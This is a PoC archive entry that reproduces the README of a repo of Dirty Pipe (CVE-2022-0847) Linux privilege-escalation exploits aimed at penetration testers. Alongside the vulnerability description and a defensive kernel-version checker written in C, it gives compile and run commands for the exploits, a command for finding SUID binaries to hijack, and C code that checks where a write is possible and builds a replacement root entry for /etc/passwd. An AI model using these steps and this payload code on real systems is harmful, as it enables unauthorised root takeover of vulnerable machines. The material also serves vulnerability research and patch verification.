POC details: 345054694b4f51008ed9edd7772f8bb125004c3f

Source
Associated vulnerability
Title: Linux kernel security vulnerability (CVE-2022-0847)
Description: The Linux kernel is the kernel of Linux, the open-source operating system of the Linux Foundation (US). The Linux kernel has a security vulnerability caused by the `flags` member of a newly allocated pipe buffer structure not being properly initialized in the copy_page_to_iter_pipe and push_pipe functions. An unprivileged local user can exploit it to escalate privileges to root. Affected versions: Linux kernel 5.8 up to, but not including, 5.16.11, 5.15.25 and 5.10.102 on their respective stable branches.
Introduction
![Dirty Pipe](https://forum.hackersploit.org/uploads/default/original/2X/a/a3cc4ce68db810c4e24d35cb929a952363f11703.png)

# CVE-2022-0847-DirtyPipe-Exploits
A collection of exploits and documentation for penetration testers and red teamers that can be used to aid the exploitation of the Linux Dirty Pipe vulnerability.

# About The Vulnerability
- Dirty Pipe (CVE-2022-0847) is a local privilege escalation vulnerability in the Linux kernel that allows an unprivileged user to do the following:
	- Overwrite data in arbitrary files that the user can only read, such as /etc/passwd. The write has limits: it cannot start on a page boundary, cannot cross a page boundary, cannot grow the file, and it lands in the page cache rather than being written back to disk by itself.
	- Obtain a root shell, by abusing either the /etc/passwd overwrite or a root-owned SUID binary.

## Affected versions
- Linux kernel 5.8 and later are affected (the bug was introduced in 5.8); mainline 5.17 ships with the fix.
- The vulnerability has been patched in the following stable kernel versions:
	- 5.16.11
	- 5.15.25
	- 5.10.102
- You can learn more about the vulnerability here: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847

# DirtyPipe Vulnerability Scanner
- If you are not sure if a target system is vulnerable, use this really cool bash script developed by @basharkey.
- DirtyPipe Checker: https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
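For readers who want to see what a version-based check actually decides, here is the upstream-version logic in C (the language of the exploits in this repo). This is an added example and not code from this repo or from basharkey's checker; the fixed releases are the three listed above, and the distribution-kernel heuristic (any `-` suffix in `uname -r`) is an assumption about how distros name their packages.

```c
#include <stdio.h>
#include <string.h>

/*
 * Added example (not part of this repo): the upstream-version test a
 * Dirty Pipe checker applies. The bug was introduced in 5.8, fixed in
 * the stable releases 5.16.11, 5.15.25 and 5.10.102, and mainline 5.17
 * shipped with the fix. The other 5.8..5.16 branches were end-of-life
 * upstream and never received it.
 */
struct fixed_release { int major, minor, patch; };

static const struct fixed_release fixed_releases[] = {
    { 5, 16, 11 },
    { 5, 15, 25 },
    { 5, 10, 102 },
};

/* Verdict codes returned by dirtypipe_version_affected(). */
enum { DP_NOT_AFFECTED = 0, DP_AFFECTED = 1, DP_UNPARSEABLE = -1 };

/*
 * Classify a `uname -r` string by upstream version only. Accepts
 * "5.10.100", "5.15.0-25-generic", "5.8", ...; anything after the
 * patch level is ignored.
 */
int dirtypipe_version_affected(const char *release)
{
    int major = 0, minor = 0, patch = 0;
    size_t i;

    if (sscanf(release, "%d.%d.%d", &major, &minor, &patch) < 2)
        return DP_UNPARSEABLE;

    if (major < 5 || (major == 5 && minor < 8))   /* pre-5.8: bug not present */
        return DP_NOT_AFFECTED;
    if (major > 5 || minor >= 17)                  /* 5.17 and later carry the fix */
        return DP_NOT_AFFECTED;

    for (i = 0; i < sizeof fixed_releases / sizeof fixed_releases[0]; i++) {
        if (fixed_releases[i].major == major && fixed_releases[i].minor == minor)
            return patch < fixed_releases[i].patch ? DP_AFFECTED : DP_NOT_AFFECTED;
    }
    return DP_AFFECTED;   /* 5.8, 5.9, 5.11..5.14: never patched upstream */
}

/*
 * Distribution kernels (assumed here to be anything with a "-" suffix,
 * e.g. "5.15.0-25-generic") keep the upstream patch level frozen and
 * backport fixes, so the test above can report a false positive for
 * them. Returns 1 when an "affected" verdict needs confirming against
 * the distro advisory (or by actually running the exploit on a scratch
 * file), 0 otherwise.
 */
int dirtypipe_verdict_needs_confirmation(const char *release)
{
    return strchr(release, '-') != NULL &&
           dirtypipe_version_affected(release) == DP_AFFECTED;
}

int main(int argc, char **argv)
{
    /* constructed sample release strings, not output from a real host */
    const char *samples[] = { "5.10.100", "5.10.102", "5.15.0-25-generic", "5.17.0", "5.4.0" };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *release = argc > 1 ? argv[1] : samples[i];
        printf("%-20s affected=%d needs_confirmation=%d\n", release,
               dirtypipe_version_affected(release),
               dirtypipe_verdict_needs_confirmation(release));
        if (argc > 1)
            break;
    }
    return 0;
}
```

Run it with no argument to see the constructed samples, or pass `"$(uname -r)"` to classify the current host. Treat `needs_confirmation=1` as "check the vendor advisory", not as a vulnerable verdict: distribution kernels routinely carry the fix without a version bump.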

## Compiling the exploit
- A bash script, compile.sh, is provided to compile both exploits.
- In order to compile the exploits successfully, you will need to have GCC installed.

```
sudo apt-get install gcc
```

- After installing GCC, you can run the 'compile.sh' script as follows:

```
chmod +x compile.sh
./compile.sh
```


# Exploit-1 - Modifying/overwriting read only files
- This repo contains 2 exploits. The 'exploit-1.c' exploit can be used to modify or overwrite arbitrary files that you can only read.
- This exploit is the proof of concept developed by Max Kellermann, modified to replace the password field of the root entry in /etc/passwd, which in turn gives you a root shell.



## Running the exploit binary
- The exploit is preconfigured to replace the root password with "piped" and first takes a backup of /etc/passwd under /tmp/passwd.bak. It then drops you into a root shell and restores the original passwd file when done.

```
./exploit-1
```
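Whether a given overwrite is even possible depends on where in the file it lands: a Dirty Pipe write cannot begin on a page boundary, cannot cross one, and cannot grow the file, which is why passwd exploits of this kind write from byte 1 of /etc/passwd and keep the original leading 'r' of the root line. The following C block is an added example (not this repo's exploit-1.c and not Kellermann's PoC) that encodes those limits from the cm4all disclosure and builds the offset-1 payload; the 4096-byte page size, the file sizes and the placeholder hash are constructed assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/*
 * Added example (not part of this repo or of Kellermann's PoC): the
 * conditions a Dirty Pipe write must satisfy, taken from the cm4all
 * disclosure. A 4096-byte page is assumed (the x86-64 default).
 */
#define DP_PAGE_SIZE 4096L

static char dp_reason[128];

/* Human-readable reason for the last refusal by dirty_pipe_can_write(). */
const char *dirty_pipe_reason(void)
{
    return dp_reason;
}

/*
 * Returns 1 if `len` bytes can be written at `offset` into a file of
 * `file_size` bytes with the bug, 0 otherwise. Read permission on the
 * file is also required but not modelled here.
 */
int dirty_pipe_can_write(off_t file_size, off_t offset, size_t len)
{
    off_t page_off = offset % DP_PAGE_SIZE;

    dp_reason[0] = '\0';
    if (len == 0) {
        snprintf(dp_reason, sizeof dp_reason, "nothing to write");
        return 0;
    }
    if (page_off == 0) {
        /* the first byte of a page cannot be written: the pipe buffer must
         * already point into a partially filled page of the file */
        snprintf(dp_reason, sizeof dp_reason,
                 "offset %lld is the first byte of a page", (long long)offset);
        return 0;
    }
    if (page_off + (off_t)len > DP_PAGE_SIZE) {
        /* the rest would go into a fresh anonymous pipe buffer, not the file */
        snprintf(dp_reason, sizeof dp_reason,
                 "write crosses the page boundary at %lld",
                 (long long)(offset - page_off + DP_PAGE_SIZE));
        return 0;
    }
    if (offset + (off_t)len > file_size) {
        /* the page cache write never changes the file size */
        snprintf(dp_reason, sizeof dp_reason,
                 "write would extend the file (%lld > %lld)",
                 (long long)(offset + (off_t)len), (long long)file_size);
        return 0;
    }
    return 1;
}

static char dp_payload[256];

/*
 * Build the replacement for the root entry of /etc/passwd, intended to
 * be written at offset 1 so the file's original leading 'r' is kept.
 * `hash` is the crypt(3) hash for the password field. Returns the
 * payload, or NULL if it does not fit the buffer.
 */
const char *passwd_root_payload(const char *hash)
{
    int n = snprintf(dp_payload, sizeof dp_payload,
                     "oot:%s:0:0:root:/root:/bin/bash\n", hash);
    if (n < 0 || (size_t)n >= sizeof dp_payload)
        return NULL;
    return dp_payload;
}

int main(void)
{
    /* constructed: a 2 KiB passwd file and a placeholder (not real) hash */
    off_t passwd_size = 2048;
    const char *payload = passwd_root_payload("HASHPLACEHOLDER");
    size_t len = strlen(payload);

    printf("offset 0: %d (%s)\n", dirty_pipe_can_write(passwd_size, 0, len), dirty_pipe_reason());
    printf("offset 1: %d\n", dirty_pipe_can_write(passwd_size, 1, len));
    printf("payload (%zu bytes): %s", len, payload);
    return 0;
}
```

The "extend the file" rule is also why exploit-1 backs up /etc/passwd before running: the payload overwrites whatever followed the original root line, so the file is only consistent again once the backup is restored.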

# Exploit-2 - Hijacking SUID binaries
- This exploit overwrites bytes in the page-cache copy of a root-owned SUID binary (not its process memory, which the bug cannot reach) so that executing the binary yields a root shell. Because the modification lives in the page cache and is not written back by itself, it does not survive eviction of that page or a reboot.

## Finding SUID binaries
```
find / -type f -perm -4000 2>/dev/null
```
## Running the exploit binary

```
./exploit-2 /usr/bin/sudo
```

## Important Note 
- I do not claim credit/ownership/disclosure of the vulnerability and all corresponding exploits hosted in this GitHub repo.
- All the credit goes to the awesome Max Kellermann, you can check out the official disclosure here: https://dirtypipe.cm4all.com/

## Credits
- https://github.com/febinrev/dirtypipez-exploit
- https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
File snapshot

```
[4.0K] /data/pocs/345054694b4f51008ed9edd7772f8bb125004c3f
├── [  71] compile.sh
├── [5.2K] exploit-1.c
├── [7.6K] exploit-2.c
└── [2.9K] README.md

0 directories, 4 files
```